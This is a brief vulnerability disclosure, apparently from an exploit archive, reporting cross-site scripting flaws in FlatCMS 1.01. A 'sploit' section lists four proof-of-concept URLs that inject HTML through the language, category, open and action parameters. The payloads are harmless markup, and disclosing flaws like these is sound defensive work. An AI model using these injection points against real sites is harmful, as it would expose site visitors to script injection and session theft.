FlatCMS version 1.01 is susceptible to multiple cross site scripting flaws.
7b8f8bdcc7e2731c49b3096d3f99ac914f0836d360b46fccd53014f27c4c9975
[Description]: A PHP Website Engine not using any database. Support for different languages. Using the directory-structure for menue creation. Directory names are the menue topics(categories), filenames beneath are menue items. XHTML compliant. Supports Modules like P
[version]: flatCMS 1.01
[vendor]: http://flatcms.org
[Vulnerability]: cross site script
[sploit]
http://[host]/[flatcms]/index.php?language=english&category=somedir&open=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=english&category=<h1> x1ng <h1/>
http://[host]/[flatcms]/index.php?language=english&module=guestbook&action=<h1> x1ng <h1>
X1ngBox |4t| gmail C0m